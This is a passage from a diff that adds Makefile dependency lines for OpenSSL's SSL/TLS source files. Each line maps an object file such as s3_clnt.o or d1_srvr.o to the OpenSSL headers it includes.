+d1_pkt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+d1_pkt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+d1_pkt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+d1_pkt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+d1_pkt.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+d1_pkt.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+d1_pkt.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+d1_pkt.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+d1_pkt.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+d1_pkt.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+d1_pkt.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+d1_pkt.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+d1_pkt.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+d1_pkt.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+d1_pkt.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+d1_pkt.o: ../include/openssl/x509_vfy.h d1_pkt.c ssl_locl.h
+d1_srtp.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+d1_srtp.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+d1_srtp.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+d1_srtp.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+d1_srtp.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+d1_srtp.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+d1_srtp.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+d1_srtp.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+d1_srtp.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+d1_srtp.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+d1_srtp.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+d1_srtp.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+d1_srtp.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+d1_srtp.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+d1_srtp.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+d1_srtp.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+d1_srtp.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h d1_srtp.c
+d1_srtp.o: srtp.h ssl_locl.h
+d1_srvr.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+d1_srvr.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+d1_srvr.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+d1_srvr.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+d1_srvr.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+d1_srvr.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+d1_srvr.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+d1_srvr.o: ../include/openssl/md5.h ../include/openssl/obj_mac.h
+d1_srvr.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+d1_srvr.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+d1_srvr.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+d1_srvr.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+d1_srvr.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+d1_srvr.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+d1_srvr.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+d1_srvr.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+d1_srvr.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+d1_srvr.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+d1_srvr.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h d1_srvr.c
+d1_srvr.o: ssl_locl.h
+kssl.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+kssl.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+kssl.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+kssl.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+kssl.o: ../include/openssl/krb5_asn.h ../include/openssl/kssl.h
+kssl.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+kssl.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+kssl.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+kssl.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+kssl.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+kssl.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+kssl.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+kssl.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+kssl.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+kssl.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+kssl.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h kssl.c
+kssl.o: kssl_lcl.h
+s23_clnt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s23_clnt.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s23_clnt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s23_clnt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s23_clnt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s23_clnt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s23_clnt.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s23_clnt.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s23_clnt.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s23_clnt.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s23_clnt.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+s23_clnt.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+s23_clnt.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+s23_clnt.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+s23_clnt.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+s23_clnt.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+s23_clnt.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+s23_clnt.o: ../include/openssl/x509_vfy.h s23_clnt.c ssl_locl.h
+s23_lib.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s23_lib.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s23_lib.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s23_lib.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s23_lib.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s23_lib.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s23_lib.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s23_lib.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s23_lib.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s23_lib.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s23_lib.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s23_lib.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s23_lib.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s23_lib.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s23_lib.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s23_lib.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s23_lib.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s23_lib.c
+s23_lib.o: ssl_locl.h
+s23_meth.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s23_meth.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s23_meth.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s23_meth.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s23_meth.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s23_meth.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s23_meth.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s23_meth.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s23_meth.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s23_meth.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s23_meth.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s23_meth.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s23_meth.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s23_meth.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s23_meth.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s23_meth.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s23_meth.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s23_meth.c
+s23_meth.o: ssl_locl.h
+s23_pkt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s23_pkt.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s23_pkt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s23_pkt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s23_pkt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s23_pkt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s23_pkt.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s23_pkt.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s23_pkt.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s23_pkt.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s23_pkt.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s23_pkt.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s23_pkt.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s23_pkt.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s23_pkt.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s23_pkt.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s23_pkt.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s23_pkt.c
+s23_pkt.o: ssl_locl.h
+s23_srvr.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s23_srvr.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s23_srvr.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s23_srvr.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s23_srvr.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s23_srvr.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s23_srvr.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s23_srvr.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s23_srvr.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s23_srvr.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s23_srvr.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+s23_srvr.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+s23_srvr.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+s23_srvr.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+s23_srvr.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+s23_srvr.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+s23_srvr.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+s23_srvr.o: ../include/openssl/x509_vfy.h s23_srvr.c ssl_locl.h
+s2_clnt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s2_clnt.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s2_clnt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s2_clnt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s2_clnt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s2_clnt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s2_clnt.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s2_clnt.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s2_clnt.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s2_clnt.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s2_clnt.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s2_clnt.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s2_clnt.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s2_clnt.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s2_clnt.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s2_clnt.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s2_clnt.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s2_clnt.c
+s2_clnt.o: ssl_locl.h
+s2_enc.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s2_enc.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s2_enc.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s2_enc.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s2_enc.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s2_enc.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s2_enc.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s2_enc.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s2_enc.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s2_enc.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s2_enc.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s2_enc.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s2_enc.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s2_enc.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s2_enc.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s2_enc.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s2_enc.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s2_enc.c
+s2_enc.o: ssl_locl.h
+s2_lib.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s2_lib.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s2_lib.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s2_lib.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s2_lib.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s2_lib.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s2_lib.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s2_lib.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s2_lib.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s2_lib.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s2_lib.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s2_lib.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s2_lib.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s2_lib.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s2_lib.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s2_lib.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s2_lib.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s2_lib.c
+s2_lib.o: ssl_locl.h
+s2_meth.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s2_meth.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s2_meth.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s2_meth.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s2_meth.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s2_meth.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s2_meth.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s2_meth.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s2_meth.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s2_meth.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s2_meth.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s2_meth.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s2_meth.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s2_meth.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s2_meth.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s2_meth.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s2_meth.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s2_meth.c
+s2_meth.o: ssl_locl.h
+s2_pkt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s2_pkt.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s2_pkt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s2_pkt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s2_pkt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s2_pkt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s2_pkt.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s2_pkt.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s2_pkt.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s2_pkt.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s2_pkt.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s2_pkt.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s2_pkt.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s2_pkt.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s2_pkt.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s2_pkt.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s2_pkt.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s2_pkt.c
+s2_pkt.o: ssl_locl.h
+s2_srvr.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s2_srvr.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s2_srvr.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s2_srvr.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s2_srvr.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s2_srvr.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s2_srvr.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s2_srvr.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s2_srvr.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s2_srvr.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s2_srvr.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s2_srvr.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s2_srvr.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s2_srvr.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s2_srvr.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s2_srvr.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s2_srvr.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s2_srvr.c
+s2_srvr.o: ssl_locl.h
+s3_both.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s3_both.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s3_both.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s3_both.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s3_both.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s3_both.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s3_both.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s3_both.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s3_both.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s3_both.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s3_both.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+s3_both.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+s3_both.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+s3_both.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+s3_both.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+s3_both.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+s3_both.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+s3_both.o: ../include/openssl/x509_vfy.h s3_both.c ssl_locl.h
+s3_cbc.o: ../crypto/constant_time_locl.h ../e_os.h ../include/openssl/asn1.h
+s3_cbc.o: ../include/openssl/bio.h ../include/openssl/buffer.h
+s3_cbc.o: ../include/openssl/crypto.h ../include/openssl/dsa.h
+s3_cbc.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+s3_cbc.o: ../include/openssl/err.h ../include/openssl/evp.h
+s3_cbc.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+s3_cbc.o: ../include/openssl/lhash.h ../include/openssl/md5.h
+s3_cbc.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s3_cbc.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s3_cbc.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s3_cbc.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s3_cbc.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s3_cbc.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s3_cbc.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s3_cbc.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s3_cbc.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s3_cbc.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s3_cbc.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s3_cbc.c
+s3_cbc.o: ssl_locl.h
+s3_clnt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s3_clnt.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+s3_clnt.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+s3_clnt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s3_clnt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s3_clnt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s3_clnt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s3_clnt.o: ../include/openssl/md5.h ../include/openssl/obj_mac.h
+s3_clnt.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+s3_clnt.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+s3_clnt.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+s3_clnt.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+s3_clnt.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+s3_clnt.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s3_clnt.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s3_clnt.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s3_clnt.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s3_clnt.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s3_clnt.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h kssl_lcl.h
+s3_clnt.o: s3_clnt.c ssl_locl.h
+s3_enc.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s3_enc.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s3_enc.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s3_enc.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s3_enc.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s3_enc.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s3_enc.o: ../include/openssl/md5.h ../include/openssl/obj_mac.h
+s3_enc.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+s3_enc.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+s3_enc.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+s3_enc.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+s3_enc.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+s3_enc.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+s3_enc.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+s3_enc.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+s3_enc.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+s3_enc.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+s3_enc.o: ../include/openssl/x509_vfy.h s3_enc.c ssl_locl.h
+s3_lib.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s3_lib.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s3_lib.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+s3_lib.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+s3_lib.o: ../include/openssl/err.h ../include/openssl/evp.h
+s3_lib.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+s3_lib.o: ../include/openssl/lhash.h ../include/openssl/md5.h
+s3_lib.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s3_lib.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s3_lib.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s3_lib.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s3_lib.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s3_lib.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s3_lib.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s3_lib.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s3_lib.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s3_lib.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s3_lib.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h kssl_lcl.h
+s3_lib.o: s3_lib.c ssl_locl.h
+s3_meth.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s3_meth.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s3_meth.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s3_meth.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s3_meth.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s3_meth.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s3_meth.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s3_meth.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s3_meth.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s3_meth.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s3_meth.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+s3_meth.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s3_meth.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s3_meth.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s3_meth.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s3_meth.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s3_meth.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h s3_meth.c
+s3_meth.o: ssl_locl.h
+s3_pkt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s3_pkt.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s3_pkt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+s3_pkt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s3_pkt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s3_pkt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s3_pkt.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s3_pkt.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s3_pkt.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s3_pkt.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s3_pkt.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+s3_pkt.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+s3_pkt.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+s3_pkt.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+s3_pkt.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+s3_pkt.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+s3_pkt.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+s3_pkt.o: ../include/openssl/x509_vfy.h s3_pkt.c ssl_locl.h
+s3_srvr.o: ../crypto/constant_time_locl.h ../e_os.h ../include/openssl/asn1.h
+s3_srvr.o: ../include/openssl/bio.h ../include/openssl/bn.h
+s3_srvr.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+s3_srvr.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+s3_srvr.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+s3_srvr.o: ../include/openssl/err.h ../include/openssl/evp.h
